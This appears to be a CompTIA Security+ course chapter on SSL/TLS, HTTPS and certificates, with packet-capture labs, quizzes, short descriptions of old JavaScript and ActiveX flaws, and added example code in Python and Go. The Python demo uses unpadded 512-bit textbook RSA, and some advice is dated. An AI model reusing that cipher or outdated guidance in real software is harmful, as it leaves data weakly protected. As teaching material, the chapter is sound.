               A Describe the SSL/TLS and HTTPS
                  protocols.

               B Discuss the vulnerabilities associated with
                  JavaScript, buffer overflow, ActiveX,
                  cookies, CGI, applets, SMTP relay, and
                  how they are commonly exploited.

               C Configure Internet Explorer security.


Topic A: SSL/TLS protocol
                          This topic covers the following CompTIA Security+ exam objectives:

                            2.3  Recognize and understand the administration of the following Internet security concepts
                                   • SSL/TLS (Secure Sockets Layer / Transport Layer Security)
                                   • HTTP/S (Hypertext Transfer Protocol / Hypertext Transfer Protocol over Secure
                                     Sockets Layer)

                            2.4  Recognize and understand the administration of the following directory security concepts
                                   • SSL/TLS (Secure Sockets Layer / Transport Layer Security)

                            4.3  Understand and be able to explain the following concepts of PKI (Public Key Infrastructure)
                                   • Certificates




                          Transport protocols
Explanation               The Secure Sockets Layer (SSL) and Transport Layer Security (TLS) are commonly
                          used protocols for managing the security of a message transmitted across the Internet.
                          Developed by Netscape, SSL is also supported by Microsoft and other Internet
                          client/server developers. SSL is included as part of both the Microsoft and Netscape
                          browsers and most Web server products. It has become the de facto standard. TLS is
                          essentially the latest version of SSL, but it is not as widely available in browsers.
                          The SSL/TLS protocol runs between the Transport and Application layers, as shown in
                          Exhibit 6-1. SSL/TLS uses TCP/IP on behalf of the higher-level protocols and allows an
                          SSL-enabled server to authenticate itself to an SSL-enabled client, the client to
                          authenticate itself to the server, and both machines to establish an encrypted connection.


Review the TCP/IP networking model before explaining that SSL/TLS runs on top of TCP.
SSL/TLS is encapsulated in a TCP header. Explain that SSL/TLS would be a sub-layer
between the Transport layer and the Application layer protocols.

[Exhibit 6-1 diagram: the TCP/IP model alongside the TCP/IP protocol suite. Application
Layer: Telnet, FTP, SMTP, DNS, RIP, SNMP, with SSL/TLS shown beneath them; Transport
Layer: TCP, UDP; Internet Layer: Internet Protocol (IP), ICMP; Network Interface:
Ethernet, PPP, Frame Relay, ATM.]

                          Exhibit 6-1: Secure Sockets Layer Protocol

         Security mechanisms
         SSL/TLS uses ciphers, which enable the encryption of data between two parties, and
         digital certificates, which provide the authentication of the end points for end-to-end
         secure communication.

         Ciphers
         There are two encryption (cipher) types used by SSL/TLS: symmetric encryption (secret
         key encryption) and asymmetric encryption (public key encryption). Used alone, both
         ciphers have their shortcomings. Symmetric encryption can be secure only if the shared
         secret key is securely exchanged. It raises the problem of how to exchange a secret key
         across the Internet, because the reason for using encryption in the first place is due to
         the insecure nature of the Internet. Asymmetric encryption solves the problem of
         securely sharing keys over the Internet, but it requires longer processing times because
         of the complexity of the algorithm.
          SSL and TLS work around these limitations by using both types of ciphers: first an
          asymmetric cipher to securely exchange the shared secret key, and then the secret key
          to transfer the data. One of the parties picks a random secret key and encrypts it with
          the other end point’s public key. The encrypted key is then sent to the other party,
          where it is decrypted using the private key known only to that party. No one else can
          decrypt the secret key, because no one else has the private key. After each end point
          knows the secret key, the parties use this shared key for symmetric (secret key)
          encryption, which can be performed quickly.
          Along with the type of cipher being used, the cipher size or strength also plays a role in
          secure transactions. Browsers that support only 40- and 56-bit keys are considered to
          have weak encryption, because keys of these sizes can be cracked in a short time period
          (approximately one week) using commonly available processing power. These weakly
          encrypted browsers are common because of U.S. regulations on the export of strong
          encryption. It’s expected that these weak browsers will become less common with the
          recent changes in regulations made by the U.S. government.
          Ciphers using 128-bit keys provide a much higher level of protection. Some SSL/TLS-
          enabled Web servers require the browser to support 128-bit ciphers to establish a
          connection.
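The hybrid exchange described above, worked through as an added teaching example (this is not code from the course): textbook RSA on a demo-sized modulus stands in for the server’s key pair, and an HMAC-SHA256 keystream stands in for the negotiated symmetric cipher; both are constructed stand-ins, labelled as such in the code, for what a real SSL/TLS stack uses.

```python
"""Hybrid key exchange as SSL/TLS uses it: an asymmetric cipher protects the
transfer of a random secret key, then a fast symmetric cipher carries the data.
Added teaching example, not code from the course. Textbook RSA on a 512-bit
modulus and an HMAC-SHA256 keystream are constructed stand-ins (not for reuse)."""
import hashlib
import hmac
import secrets


def is_probable_prime(n, rounds=32):
    """Miller-Rabin probabilistic primality test."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = secrets.randbelow(n - 3) + 2
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False          # witness found: n is composite
    return True


def random_prime(bits):
    """Random odd prime with the top bit set, so p*q has the intended size."""
    while True:
        candidate = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(candidate):
            return candidate


def rsa_keypair(bits=512):
    """Return (public_key, private_key) as ((n, e), (n, d))."""
    e = 65537
    while True:
        p, q = random_prime(bits // 2), random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e != 0:     # e is prime, so this is gcd(e, phi) == 1
            break
    return (p * q, e), (p * q, pow(e, -1, phi))


def rsa_encrypt(public_key, message):
    """Textbook RSA (no padding): only the holder of d can undo this."""
    n, e = public_key
    m = int.from_bytes(message, "big")
    if m >= n:
        raise ValueError("message must be smaller than the modulus")
    return pow(m, e, n)


def rsa_decrypt(private_key, ciphertext, length):
    n, d = private_key
    return pow(ciphertext, d, n).to_bytes(length, "big")


def keystream_xor(key, data):
    """Symmetric stream cipher: HMAC-SHA256(key, counter) as the keystream.
    The same call encrypts and decrypts (a real protocol derives per-direction keys)."""
    out = bytearray()
    for start in range(0, len(data), 32):
        counter = (start // 32).to_bytes(8, "big")
        block = hmac.new(key, counter, hashlib.sha256).digest()
        out.extend(b ^ k for b, k in zip(data[start:start + 32], block))
    return bytes(out)


def ssl_style_session(plaintext):
    """Run the exchange the text describes and report what each side ends with."""
    server_public, server_private = rsa_keypair(512)
    # Client: pick a random 128-bit secret key and encrypt it with the
    # server's public key. Only the server can unwrap it.
    client_secret = secrets.token_bytes(16)
    wrapped_key = rsa_encrypt(server_public, client_secret)
    # Server: recover the secret key with the private key it alone holds.
    server_secret = rsa_decrypt(server_private, wrapped_key, 16)
    # Both sides now switch to the fast symmetric cipher for the actual data.
    on_the_wire = keystream_xor(client_secret, plaintext)
    recovered = keystream_xor(server_secret, on_the_wire)
    return {"keys_match": client_secret == server_secret,
            "wire_bytes": on_the_wire,      # what an eavesdropper sees
            "recovered": recovered}


if __name__ == "__main__":
    session = ssl_style_session(b"GET /account HTTP/1.1")
    print("shared key agreed:", session["keys_match"])
    print("on the wire:", session["wire_bytes"].hex(), "| server reads:", session["recovered"])
```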

Do it!   A-1:     Determining the browser’s cipher strength
           1 Log on as Administrator
           2 Open Internet Explorer
             Why: To determine what key size is currently enabled on your browser.
           3 Choose Help, About Internet Explorer
             Why: The heading called “Cipher Strength” specifies the key size. If you don’t have
             128-bit encryption, you can click on the Update Information link to the right of the
             “Cipher Strength” heading to download the 128-bit encryption software.

                     Digital certificates
Explanation          Digital certificates enable authentication of the parties involved in a secure transaction.
                     A typical certificate has the following components:
                         • The certificate issuer’s name
                         • The entity for which the certificate is being issued (also called the “subject”)
                         • The public key of the subject
                         • Time stamp
                     Certificates are typically issued by certificate authorities (CA) that act as a trusted third
                     party. Certificates can be considered a standard way of binding a public key to a name,
                     verifying the identity of the parties involved. Certificates prevent users from
                     impersonating other parties.
                     There are two distinct types of certificate authorities that issue digital certificates:
                         • Public certificate authorities, such as VeriSign, are recognized as trusted by most
                           Web browsers and servers. A certificate issued by a public CA is usually used
                           when no other relation exists between two parties.
                         • Private certificate authorities are established in-house by enterprises that need to
                           create their own closed, private certificate infrastructure.

Do it!                       A-2:   Installing Ethereal to be able to analyze SSL packets
                              Explain to students that Ethereal is used to examine data from a live network via an
                              Ethernet interface, and there are four main tasks to perform in this activity.
                              1 Download the ethereal-setup-0.10.12.exe file to C:\Security
                                Why: Your instructor will advise you on the download steps.
                              2 Download the WinPcap auto-installer program to C:\Security
                                Why: Your instructor will advise you on the download steps.
                              3 Open C:\Security
                                Why: To install WinPcap.
                              4 Double-click the WinPcap_3_1.exe file
                                Why: To run the auto-install program.
                                Accept all defaults and the user agreement
                                After the installation is complete, restart the computer
                              5 Log in as Administrator
                              6 Open C:\Security
                                Why: To install Ethereal.
                                Double-click the Ethereal-setup-0.10.12 file
                                Accept the license agreement and all defaults
                              7 Check Run Ethereal 0.10.12 and click Finish
                                Why: To launch Ethereal.

                         Encryption and online banking
Explanation              Although many different types of sites require encryption of data that travels over the
                         Internet, banks clearly have a strong interest. NetBank was one of the first FDIC-
                         insured banks with accounts that can be fully managed over the Internet. With all of the
                         potential vulnerabilities present on the Internet, all account activity is encrypted using
                         SSL. You’ll observe encrypted and non-encrypted interactions using Ethereal.

Do it!                   A-3:     Configuring Ethereal and capturing a Web session
                            1 Launch a Web browser
                              Go to http://www.netbank.com
                            2 Return to the open Ethereal program
                            3 Choose Capture, Options…
                            4 Click the pull-down Interface menu
                              Choose the interface that’s connected to your Ethernet network
                              Why: You might have only one interface listed.
                            5 Clear Capture packets in promiscuous mode
                            6 Check the three Name Resolution selections
                              Click Start
                              Why: After completing the configuration, to begin capturing packets.
                            7 Return to the browser
                              Refresh the page that’s already loaded
                              Why: Wait until the refresh is finished.
                            8 Return to the Ethereal Capture window
                              Why: You'll see information about captured packets.
                              Click Stop
                              Why: The Ethereal Network Analyzer window displays.
                            9 Maximize the Ethereal Network Analyzer window

                         Working with Ethereal's capture output
Explanation              After you run the Ethereal Capture program, you'll need to analyze the information it
                         captured. You do this in the Ethereal Network Analyzer window, which is divided into
                         several panes of information.

Do it!                   A-4:     Reviewing decoded packets in plaintext
                            1 Review the records in the top pane
                            2 Click on the first record with HTTP as the Protocol and GET as the first word of
                              the Info field
                              Review the information in the middle pane
                              Why: This shows information about the protocols used to refresh this page.
                            3 Click on any entry in the middle pane
                              Why: You will see the equivalent data highlighted in the bottom pane. This is the
                              actual data, coded in hexadecimal and ASCII format.
                            4 Expand Internet Protocol
                              Why: In the middle pane.
                              Locate the source and destination addresses
                              Why: Record the entries below:
                                Source: ___________________________
                                Destination: _______________________
                            5 Expand Transmission Control Protocol
                              Why: In the middle pane.
                              Locate the source and destination ports and the next sequence number
                              Why: Record the entries below:
                                Source: _______________________________
                                Destination: ___________________________
                                Next sequence number: __________________
                            6 Expand the Hypertext Transfer Protocol entry
                              Why: In the middle pane.
                              Locate the Host entry and click on it
                              Why: The hostname is selected in the bottom pane as well. This should be readable
                              as ASCII text.
                            7 Return to the top pane and review the information for several of the other HTTP
                              packets with a destination of your local computer
                              Why: All HTTP data should be readable in the bottom pane. Make sure you select the
                              Hypertext Transfer Protocol in the middle pane first.

                           Analyzing SSL sessions
Explanation                You can also use Ethereal to analyze secure SSL sessions, such as a session with an
                           online banking institution.

Do it!                     A-5:     Analyzing an SSL session
                           Here’s how / Here’s why
                            1 In the Netbank browser window, click Account Login, to access a Web page
                              using SSL.

                            2 If prompted by a Security Alert message, check “In the future, do not show
                              this warning” and click OK.

Make sure students do not click Login.

                            3 Enter your first and last names as the User ID and Password, respectively,
                              but don’t click Login.

                            4 Return to Ethereal and choose Capture, Start. Click Continue without Saving,
                              to begin a new capture.

                            5 In the browser, click Login. If you're prompted by AutoComplete, specify to
                              not offer to remember passwords, and click No.

                              When the page finishes loading with an error, stop the Ethereal capture.

                            6 In the Ethereal Network Analyzer window, review the first three TCP packets
                              by clicking on them in the top pane. These are the three-way handshake
                              between your host and the server to establish the connection.

                            7 Find the following entries in the top pane and review the Secure Socket
                              Layer content of these frames in the middle pane:
                               •   SSL Client Hello
                               •   Server Hello
                               •   Change Cipher Spec
                               •   Application Data
                              The first three entries describe the negotiation for and exchange of ciphers.
                              The Application Data entry contains the transmission of the HTML data. Notice
                              that you can no longer read the HTML script in the bottom pane due to the
                              SSL encryption.

                            8 Close Ethereal.
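What Ethereal is labeling in step 7 is the TLS record layer: every record begins with a one-byte content type, a two-byte version and a two-byte length, and for a handshake record the first payload byte names the handshake message (1 is Client Hello, 2 is Server Hello). The Go program below is an added example, not part of this course and not Ethereal's code. It parses a constructed byte string of four records and labels them the way the analyzer's middle pane does, and it records that, once Change Cipher Spec has gone by, the later payloads are ciphertext, which is why the HTML inside Application Data can no longer be read. The record bytes are constructed for the example, the hello bodies are placeholders rather than real negotiation data, and the function names are this example's own.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

// TLS record-layer content types (RFC 2246, section 6.2.1).
const (
	ctChangeCipherSpec = 20
	ctAlert            = 21
	ctHandshake        = 22
	ctApplicationData  = 23
)

// Record is one parsed TLS record: a 5-byte header plus its payload.
type Record struct {
	Label   string // what the analyzer would show, e.g. "Client Hello"
	Version uint16 // version field from the record header (0x0301 = TLS 1.0)
	Length  int    // payload length in bytes
}

// labelRecord names a record the way the analyzer's middle pane does. For a
// handshake record the first payload byte is the handshake message type, but
// that byte is only meaningful while the payload is still in the clear.
func labelRecord(ctype byte, payload []byte, encrypted bool) string {
	switch ctype {
	case ctChangeCipherSpec:
		return "Change Cipher Spec"
	case ctAlert:
		return "Alert"
	case ctApplicationData:
		return "Application Data"
	case ctHandshake:
		if encrypted || len(payload) == 0 {
			return "Encrypted Handshake Message"
		}
		names := map[byte]string{1: "Client Hello", 2: "Server Hello", 11: "Certificate", 16: "Client Key Exchange", 20: "Finished"}
		if n, ok := names[payload[0]]; ok {
			return n
		}
		return fmt.Sprintf("Handshake (type %d)", payload[0])
	}
	return fmt.Sprintf("Unknown (%d)", ctype)
}

// ParseRecords walks a stream of concatenated TLS records. After a Change
// Cipher Spec has been seen, later payloads are treated as ciphertext (in a
// real capture each direction switches independently; this simplified view
// keeps one flag). That switch is why the HTML carried in Application Data is
// no longer readable in the bottom pane.
func ParseRecords(stream []byte) ([]Record, error) {
	var out []Record
	encrypted := false
	for len(stream) > 0 {
		if len(stream) < 5 {
			return out, errors.New("truncated record header")
		}
		ctype := stream[0]
		version := binary.BigEndian.Uint16(stream[1:3])
		length := int(binary.BigEndian.Uint16(stream[3:5]))
		if len(stream) < 5+length {
			return out, errors.New("truncated record payload")
		}
		payload := stream[5 : 5+length]
		out = append(out, Record{labelRecord(ctype, payload, encrypted), version, length})
		if ctype == ctChangeCipherSpec {
			encrypted = true
		}
		stream = stream[5+length:]
	}
	return out, nil
}

// SampleStream is a constructed stand-in for a capture, not real traffic: a
// Client Hello, a Server Hello, a Change Cipher Spec and one Application Data
// record. The hello bodies are placeholders; only the framing matters here.
func SampleStream() []byte {
	rec := func(ctype byte, payload []byte) []byte {
		hdr := []byte{ctype, 0x03, 0x01, byte(len(payload) >> 8), byte(len(payload))}
		return append(hdr, payload...)
	}
	clientHello := []byte{1, 0, 0, 4, 0x03, 0x01, 0, 0} // type 1, body length 4
	serverHello := []byte{2, 0, 0, 4, 0x03, 0x01, 0, 0} // type 2, body length 4
	var s []byte
	s = append(s, rec(ctHandshake, clientHello)...)
	s = append(s, rec(ctHandshake, serverHello)...)
	s = append(s, rec(ctChangeCipherSpec, []byte{1})...)
	s = append(s, rec(ctApplicationData, []byte{0xde, 0xad, 0xbe, 0xef})...) // ciphertext, not HTML
	return s
}

func main() {
	recs, err := ParseRecords(SampleStream())
	if err != nil {
		panic(err)
	}
	for i, r := range recs {
		fmt.Printf("%d: %-20s version=%#04x length=%d\n", i+1, r.Label, r.Version, r.Length)
	}
}
```

The truncation checks matter in practice: a capture that ends mid-record, or a length field larger than the bytes that follow, must produce an error rather than a read past the end of the buffer.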
6–10     CompTIA Security+ Certification

Do it!              A-6:      Reviewing SSL and TLS
                      Questions and answers
                       1 Where does the SSL/TLS protocol fit within the TCP/IP protocol stack?
                          A      At the Network layer
                          B      At the Physical layer
                          C      Between the Data Link layer and the Network layer
                          D      Between the Transport layer and the Application layer

                       2 What are the two encryption types used by SSL and TLS?

                          Asymmetric (public key) and symmetric (secret key)

                       3 How does SSL/TLS use both asymmetric and symmetric ciphers?

                          It encrypts the data with a secret key, and then encrypts the secret key using the asymmetric
                          cipher. It then transmits both to the receiver. The receiver uses the private key to decrypt the
                          secret key, and then uses the secret key to decrypt the data.

                       4 Which of the following cannot be found in a digital certificate?
                          A      Certificate issuer’s name
                          B      Entity for whom the certificate is being issued
                          C      Public key of the certificate authority
                          D      Time stamp

                       5 Public certificate authorities are used when no other relation exists between two
                         parties. True or false?

                          True

                          Implementation using HTTPS
Explanation               The Hypertext Transfer Protocol over SSL (HTTPS) is a communications protocol
                          developed by Netscape to transfer encrypted information between computers over the
                          World Wide Web. HTTPS is essentially a variation of HTTP, the commonly used
                          Internet protocol, which uses SSL encryption for security.

                          Most implementations of the HTTPS protocol are used to enable online purchasing or
                          the exchange of private information and resources over insecure networks. Accessing a
                          secure server often requires some sort of registration, login, or purchase.

                          After a digital certificate is installed on a secure server, a client is able to connect to the
                          server using the HTTPS protocol on an SSL-enabled Web browser such as Netscape
                          Navigator or Microsoft Internet Explorer. Any file that is transmitted from the server to
                          a client with a Web browser using the HTTPS protocol is considered secure.

                          The following steps outline how HTTP combines with SSL to enable secure
                          communication between a client and a server:

                             1 By accessing a URL with HTTPS, the client requests a secure transaction and
                                 informs the server about the encryption algorithms and key sizes that it supports.

                             2 The server sends the requested server certificate, which contains the server’s
                                 public key that has been signed by a CA. The CA is considered a trusted party
                                 with a public key available to all clients. The CA also sends a list of supported
                                 ciphers and key sizes in order of priority.

                             3 The client then generates a new secret symmetric session key based on the
                                 priority list sent by the server. The client also compares the CA that issued the
                                 certificate to its list of trusted CAs, verifies the certificate has not expired, and
                                 confirms the certificate belongs to the server intended for communication.

                             4 After the validity of the certificate has been confirmed, the client encrypts a copy
                                 of the new session key it generated with the public key of the server obtained
                                 from the certificate. The client then sends the new encrypted key to the server.

                             5 The server decrypts the new session key with its own private key. Upon
                                 completion of this step, both the client and server have the same secret session
                                 key that can now be used to secure further communication and data transport.

As an exercise, have students draw a flowchart of sorts that describes the process and the
decisions that occur during the process—this should help them understand how the public and
secret keys are used.

                          When accessing a secure Web site using SSL, the location bar on the browser will show
                          https instead of http and the padlock icon will appear closed on the status bar of the
                          browser.

                          Only the URL using the HTTPS protocol is considered secure; therefore, all pages that
                          need to be transferred in a secure mode need to use HTTPS.

                         Viewing certificates
Explanation              You can view certificates by double-clicking the padlock icon in the browser's status
                         bar. The General tab provides general information about the certificate, such as to
                         whom the certificate was issued, who it was issued by, and when it's valid. The Details
                         tab provides you with more detailed information, including:
                             • Version — The version of X.509 used to create the certificate.
                             • Serial Number — The unique serial number for the certificate.
                             • Signature Algorithm — The encryption algorithm used to create the
                               certificate’s signature.
                             • Issuer — The issuer of the certificate.
                             • Valid From — The date from which the certificate is valid.
                             • Valid To — The date after which the certificate expires.
                             • Subject — Used to establish the certificate holder, which typically includes the
                               identification and geographic information.
                             • Public Key — The certificate’s encrypted public key.
                             • Thumbprint Algorithm — The encryption algorithm used to create the
                               certificate’s thumbprint.
                             • Thumbprint — The encrypted thumbprint of the signature (for example,
                               message digest).
                             • Friendly Name — The descriptive name assigned to the certificate.
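The five handshake steps in the previous section and the Details fields just listed can be exercised together in code. The Go program below is an added example; it is not from this course, from Ethereal or from any browser vendor. It builds a constructed CA and a server certificate the CA signs, lists the Details fields for the server certificate (computing the thumbprint as SHA-1 over the DER-encoded certificate, which is how Windows derives the value shown in that tab), performs the client's step-3 checks (issuer in the trusted list, validity period, name matches the intended host), and carries out the session-key transport of steps 4 and 5 using RSA-OAEP. The CA name, hostname and key sizes are constructed values, and `issue`, `NewPKI`, `Details`, `ClientVerify` and `KeyTransport` are names chosen for this example.

```go
package main

import (
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha1"
	"crypto/sha256"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

// PKI is a constructed chain generated in-process (not issued by a real CA).
type PKI struct {
	CACert  *x509.Certificate
	SrvKey  *rsa.PrivateKey
	SrvCert *x509.Certificate
}

// issue signs tmpl under parent with the signer's key, then re-parses the DER
// so the result carries Raw, Issuer and the other parsed fields.
func issue(tmpl, parent *x509.Certificate, pub *rsa.PublicKey, signer *rsa.PrivateKey) *x509.Certificate {
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parent, pub, signer)
	if err != nil {
		panic(err)
	}
	c, _ := x509.ParseCertificate(der)
	return c
}

// NewPKI models the trust relationship in the text: the CA signs the server's
// public key, and clients keep the CA's public key in their trusted list.
func NewPKI(host string) *PKI {
	caKey, _ := rsa.GenerateKey(rand.Reader, 2048)
	srvKey, _ := rsa.GenerateKey(rand.Reader, 2048)
	now := time.Now().Add(-time.Hour)
	caTmpl := &x509.Certificate{
		SerialNumber: big.NewInt(1),
		Subject:      pkix.Name{CommonName: "Example Training CA"}, // constructed name
		NotBefore:    now, NotAfter: now.Add(10 * 365 * 24 * time.Hour),
		IsCA:         true, BasicConstraintsValid: true,
		KeyUsage:     x509.KeyUsageCertSign,
	}
	ca := issue(caTmpl, caTmpl, &caKey.PublicKey, caKey) // self-signed root
	srvTmpl := &x509.Certificate{
		SerialNumber: big.NewInt(2),
		Subject:      pkix.Name{CommonName: host},
		DNSNames:     []string{host}, // verifiers match the requested host here
		NotBefore:    now, NotAfter: now.Add(365 * 24 * time.Hour),
		KeyUsage:     x509.KeyUsageKeyEncipherment, // RSA key transport
	}
	return &PKI{ca, srvKey, issue(srvTmpl, ca, &srvKey.PublicKey, caKey)}
}

// Details returns the fields the browser's Details tab lists. The thumbprint
// is computed the way Windows does it: SHA-1 over the DER-encoded certificate.
func Details(c *x509.Certificate) map[string]string {
	sum := sha1.Sum(c.Raw)
	return map[string]string{
		"Version":             fmt.Sprint(c.Version),
		"Serial Number":       c.SerialNumber.String(),
		"Signature Algorithm": c.SignatureAlgorithm.String(),
		"Issuer":              c.Issuer.CommonName,
		"Valid From":          c.NotBefore.UTC().Format(time.RFC3339),
		"Valid To":            c.NotAfter.UTC().Format(time.RFC3339),
		"Subject":             c.Subject.CommonName,
		"Public Key":          c.PublicKeyAlgorithm.String(),
		"Thumbprint":          fmt.Sprintf("%x", sum[:]),
	}
}

// ClientVerify is step 3 in the text: the issuer must be one of the trusted
// CAs, the certificate must be inside its validity period, and its name must
// match the host the client meant to reach. Any failure aborts the handshake.
func ClientVerify(srv *x509.Certificate, host string, trusted ...*x509.Certificate) error {
	roots := x509.NewCertPool()
	for _, c := range trusted {
		roots.AddCert(c)
	}
	_, err := srv.Verify(x509.VerifyOptions{Roots: roots, DNSName: host})
	return err
}

// KeyTransport is steps 4 and 5: the client generates a fresh symmetric
// session key, encrypts it to the server's public key (RSA-OAEP here), and the
// server recovers it with its private key. Both copies are returned so the
// caller can confirm that the two sides now share the same secret.
func KeyTransport(srvCert *x509.Certificate, srvKey *rsa.PrivateKey) (clientKey, serverKey []byte, err error) {
	clientKey = make([]byte, 32) // 256-bit session key
	if _, err = rand.Read(clientKey); err != nil {
		return nil, nil, err
	}
	pub := srvCert.PublicKey.(*rsa.PublicKey)
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, clientKey, nil)
	if err != nil {
		return nil, nil, err
	}
	serverKey, err = rsa.DecryptOAEP(sha256.New(), rand.Reader, srvKey, wrapped, nil)
	return clientKey, serverKey, err
}

func main() {
	host := "secure.netbank.example" // constructed hostname
	p := NewPKI(host)
	fmt.Println(Details(p.SrvCert))
	fmt.Println("verify:", ClientVerify(p.SrvCert, host, p.CACert))
	c, s, err := KeyTransport(p.SrvCert, p.SrvKey)
	fmt.Println("session keys match:", err == nil && string(c) == string(s))
}
```

The two negative cases worth checking are the ones `ClientVerify` rejects: a certificate whose issuer is not in the trusted list, and a certificate whose name does not match the host that was requested. Both fail before any session key is sent, which is the order step 4 in the text requires.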

Do it!                   A-7:     Viewing the SSL certificate
                           Here’s how / Here’s why
                            1 In your browser, return to the Netbank login page.

                            2 Double-click the SSL icon (the padlock icon in the status bar).

                              Review the general certificate information.

                            3 Activate the Details tab.

                            4 Click each field, to view detailed certificate information.

                            5 Activate the Certification Path tab.

                            6 Select the CA (if necessary).

                            7 Click View Certificate, to view the certificate of the CA.

                            8 Click OK, to close the certificate information.

Do it!              A-8:      Discussing HTTPS
                      Questions and answers
                       1 Return to the https://secure.nhetbank.com/login.htm.

                          When does this certificate expire?

                          (Answers will vary.) As of this book’s printing, 5/24/2006.

                       2 What algorithm was used to create the message digest?

                          sha1

                       3 What algorithm was used to sign the certificate?

                          sha1RSA

                       4 How does the browser indicate whether an HTTPS page is displayed?

                          The location bar on the browser will show https instead of http, and the padlock icon will
                          appear closed on the status bar of the browser.

                       5 The client generates a secret session key based on the _______________ sent by
                         the server.

                          Priority list

                       6 The client encrypts a copy of the new session key it generated with the public key
                         of the server obtained from the certificate. True or false?

                          True


Topic B: Vulnerabilities of Web tools
              This topic covers the following CompTIA Security+ exam objective:

               #       Objective

               2.3     Recognize and understand the administration of the following Internet security concepts
                        • Vulnerabilities
                            • Java Script
                            • ActiveX
                            • Buffer Overflows
                            • Cookies
                            • Signed Applets
                            • CGI (Common Gateway Interface)
                            • SMTP (Simple Mail Transfer Protocol) Relay




              Web application security
Explanation   With the rising complexity of Web and multimedia applications, online business tools
              and information sources are becoming more vulnerable to outside threats. Any
              combination of increasingly complex code, ineffective development schedules, lack of
              quality assurance, and unskilled personnel can lead to serious security loopholes. For
              many corporations, security of Web applications and online services is as critical an
              issue as their intended functionality.

              JavaScript
              JavaScript is a scripting language developed by Netscape to enable Web authors to
              design interactive sites. JavaScript code is typically embedded into an HTML document
              and placed somewhere between the <head> and </head> tags. The HTML tags that
              indicate the beginning and ending of JavaScript code are <script> and </script>. It’s
              possible to have multiple blocks of code within an HTML page, as long as they are
              surrounded by the aforementioned tags. One could also make a reference to an external
              JavaScript code instead of inserting the actual code within the body of the HTML code.
              A typical example of JavaScript code within an HTML document is as follows:
                     <html>
                     <head>
                     <title>Example JavaScript</title>
                     <script language="JavaScript">
                     document.writeln("Example");
                     </script>
                     </head>
                     <body>
                     .
                     .
                     </body>
                     </html>

                  Many Web browsers support the ability to download JavaScript programs with an
                  HTML page and execute them within the browser. Such programs are often used to
                  interact with the client or browser user and transmit information back to the Web server
                  that provided the page. These programs can also perform tasks outside of the user’s
                  control such as changing a default Web page or sending an e-mail out to a distribution
                  list.

                  Vulnerabilities
                  JavaScript programs are executed based on the intended functionality and security
                  context of the Web page with which they were downloaded. Such programs have
                  restricted access to other resources within the browser. Security loopholes exist in
                  certain Web browsers that permit JavaScript programs to monitor a client’s (browser’s)
                  activities beyond its intended purpose. The execution of such programs and passing of
                  information between the server and browser or client usually takes place without the
                  knowledge of the client. Malicious JavaScript programs can even make their way
                  through firewalls, which lack the configuration parameters to prevent such activities.
                  Some of the documented security holes associated with JavaScript on various browsers
                  are:
                      • Monitoring Web browsing — The CERT Coordination Center unveiled
                        JavaScript vulnerabilities that allow an attacker to monitor the browsing
                        activities of a user even when visiting a secure (HTTPS) Web page and behind a
                        firewall. This information includes the URL addresses of browsed pages and
                        cookies downloaded to client machines by the visited Web servers.
                      • Reading password and other system files — The JavaScript implementation in
                        Netscape versions 4.04 through 4.74 allows JavaScript embedded in HTML code
                        to read sensitive files (including system password files) and transmit them
                        back to the owner of the page. A similar vulnerability is inherent in
                        Microsoft Internet Explorer 4.0-4.01.
                      • Reading browser’s preferences — Certain versions of Netscape allow
                        embedded JavaScript to access the “preferences” file, which contains
                        information such as e-mail servers, mailbox files, e-mail addresses, and even
                        e-mail passwords.

                  Safeguards
                  Many browsers provide additional patches to fix JavaScript-related vulnerabilities.
                  These patches are typically downloadable from the vendors’ (such as Microsoft and
                  Netscape) Web sites. Unless the patch is available from the browser vendor, users
                  should disable JavaScript to avoid being victimized by such programs.

ActiveX
ActiveX is a loosely defined set of technologies developed by Microsoft that provides
tools for linking desktop applications to WWW content. It enables self-contained
software components to interact with a wide variety of applications. Certain components
of ActiveX can be triggered by use of HTML scripts to provide rich Web content to
clients. For instance, ActiveX technology allows users to view Word and Excel
documents directly from a browser interface. MS Office applications (Microsoft Access,
Excel, and PowerPoint) are examples of built-in ActiveX components.

Vulnerabilities
These applications utilize embedded Visual Basic code that compromises the integrity,
availability, and confidentiality of a target system. Microsoft Office specifications
support the integration of certain kinds of macros, written in Visual Basic (VB), into
MS Office documents. An attacker could potentially embed harmful macros into these
documents that could compromise a target system or information stored on that system.
After embedding malicious macros into such documents, an attacker can create an
HTML interface or link that references the infected file. The HTML is then distributed
by e-mail to the target systems. If the receiver of the infected files is an HTML-enabled
mail client, the embedded code in the referenced document is executed without the Web
client’s knowledge. Many mail clients provide an auto preview feature, so no action
might be required on the part of the victim for this action to occur. As a result of this
vulnerability, an attacker could gain access to sensitive information (passwords or other
private data stored on the system), edit the registry settings of the target system, or use
the target system to launch attacks on other systems, as in the case of a distributed
denial-of-service attack.

Safeguards
Microsoft has developed certain patches to address vulnerabilities exposed by ActiveX.
Unless specifically needed, however, the best way to protect against such attacks is to
disable ActiveX scripting altogether from the client.

Do it!              B-1:      Discussing JavaScript and ActiveX vulnerabilities
                      Questions and answers
                       1 Which of the following HTML tags indicates the beginning of JavaScript code?
                          A      <body>
                          B      <title>
                          C      <A>
                          D      <script>

                       2 Which of the following is true of JavaScript programs? (Choose all that apply.)
                          A      They can be downloaded with an HTML page.
                          B      They can perform tasks undetected by the user.
                          C      They can pass through firewalls.
                          D      They can monitor the browsing activities of a user.

                       3 ActiveX allows users to view MS Office documents directly from a browser
                         interface. True or false?

                          True

                       4 An attacker could use ActiveX to embed harmful macros into MS Office
                         documents. True or false?

                          True

                       5 The best way to protect against virus infections by ActiveX is to:
                          A      Switch on the auto preview feature in the e-mail program.
                          B      Modify the ActiveX script.
                          C      Use an antivirus scanner.
                          D      Disable ActiveX scripting.

              Buffer overflows
